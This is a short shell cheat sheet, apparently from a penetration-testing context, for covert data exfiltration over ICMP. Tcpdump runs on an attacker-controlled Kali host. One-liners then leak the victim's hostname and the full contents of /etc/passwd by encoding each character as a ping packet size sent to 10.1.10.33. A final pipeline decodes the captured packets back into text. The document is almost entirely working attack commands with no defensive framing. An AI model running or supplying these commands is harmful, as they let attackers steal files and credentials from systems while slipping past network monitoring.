step 1
# run this on the receiving system (this is what we control)
tcpdump -nni eth0 -e icmp[icmptype] == 8 -w output.pcap

step 2
# send the hostname as output
# ip is the name/ip of the receiver in step 1 (local kali host)
ip=10.1.10.33;output=`hostname`;for ((i=0;i<${#output};i++));do; ping -c 1 -s `printf '%d\n' "'${output:$i:1}'"` $ip;done

# test send the passwd file ...
ip=10.1.10.33;ext=`cat /etc/passwd`;for ((i=0;i<${#ext};i++));do; ping -c 1 -s `printf '%d\n' "'${ext:$i:1}'"` $ip;done

step 3
# stop tcpdump from step 1
# read in the pcap file, spit out the data in readable format
tcpdump -ttttnnr output.pcap | awk '{print $NF}' | while read ord; do printf "\\$(printf '%03o' "`expr $ord - 8`")"; done; echo
